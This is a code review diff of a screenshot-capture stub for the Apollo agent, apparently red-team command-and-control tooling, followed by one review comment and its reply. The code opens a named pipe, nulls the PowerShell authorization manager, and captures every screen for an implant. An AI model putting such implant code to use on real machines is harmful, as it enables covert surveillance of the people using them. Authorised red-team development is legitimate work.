Payload_Type/Apollo/agent_code/ScreenshotLoaderStub/Program.cs

```diff
@@ -0,0 +1,150 @@
+        public static NamedPipeServerStream CreateNamedPipeServer(string pipeName)
+        {
+            PipeSecurity pipeSecurityDescriptor = new PipeSecurity();
+            PipeAccessRule everyoneAllowedRule = new PipeAccessRule("Everyone", PipeAccessRights.ReadWrite, AccessControlType.Allow);
+            PipeAccessRule networkDenyRule = new PipeAccessRule("Network", PipeAccessRights.ReadWrite, AccessControlType.Deny);       // This should only be used locally, so lets limit the scope
+            pipeSecurityDescriptor.AddAccessRule(everyoneAllowedRule);
+            pipeSecurityDescriptor.AddAccessRule(networkDenyRule);
+
+            // Gotta be careful with the buffer sizes. There's a max limit on how much data you can write to a pipe in one sweep. IIRC it's ~55,000, but I dunno for sure.
+            NamedPipeServerStream pipeServer = new NamedPipeServerStream(pipeName, PipeDirection.InOut, 10, PipeTransmissionMode.Byte, PipeOptions.None, 32768, 32768, pipeSecurityDescriptor);
+
+            return pipeServer;
+        }
+
+
+        public static void InitializeNamedPipeServer(string pipeName)
+        {
+            NamedPipeServerStream pipeServer = null;
+
+            try
+            {
+                pipeServer = CreateNamedPipeServer(pipeName);
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("ERROR: Could not start named pipe server. " + e.Message);
+            }
+
+            if (pipeServer == null)
+                KillJob(JobExitCode.PipeStartError);
+
+            try
+            {
+                Console.WriteLine("Pipe: " + pipeName + " Ready To Go!");
+                // We shouldn't need to go async here since we'll only have one client, the agent core, and it'll maintain the connection to the named pipe until the job is done
+                pipeServer.WaitForConnection();
+                Console.WriteLine("Connection received to pipe.");
+
+            }
+            catch (Exception e)
+            {
+                pipeServer.Close();
+                return;
+            }
+
+            using (StreamWriter writer = new StreamWriter(pipeServer))
+            {
+                writer.AutoFlush = true;
+                try
+                {
+
+                    InitialSessionState state = InitialSessionState.CreateDefault();
+                    state.AuthorizationManager = null;
+
+                }
+                catch (Exception e)
+                {
+                    Console.WriteLine("ERROR: Unhandled exception in the ScreenshotRunner: {0}\n{1}", e.Message, e.StackTrace);
+                    //Console.WriteLine(e);
+                }
+
+                BinaryFormatter bf = new BinaryFormatter();
+
+                List<byte[]> screenShots = new List<byte[]>();
+
+                foreach (Screen screen in Screen.AllScreens)
+                {
+                   screenShots.Add(GetScreenshot(screen));
```

Comment:
We should be wrapping this in a try/catch so that if an error occurs, the agent will know about it.

Reply:
Fixed in 389f9c3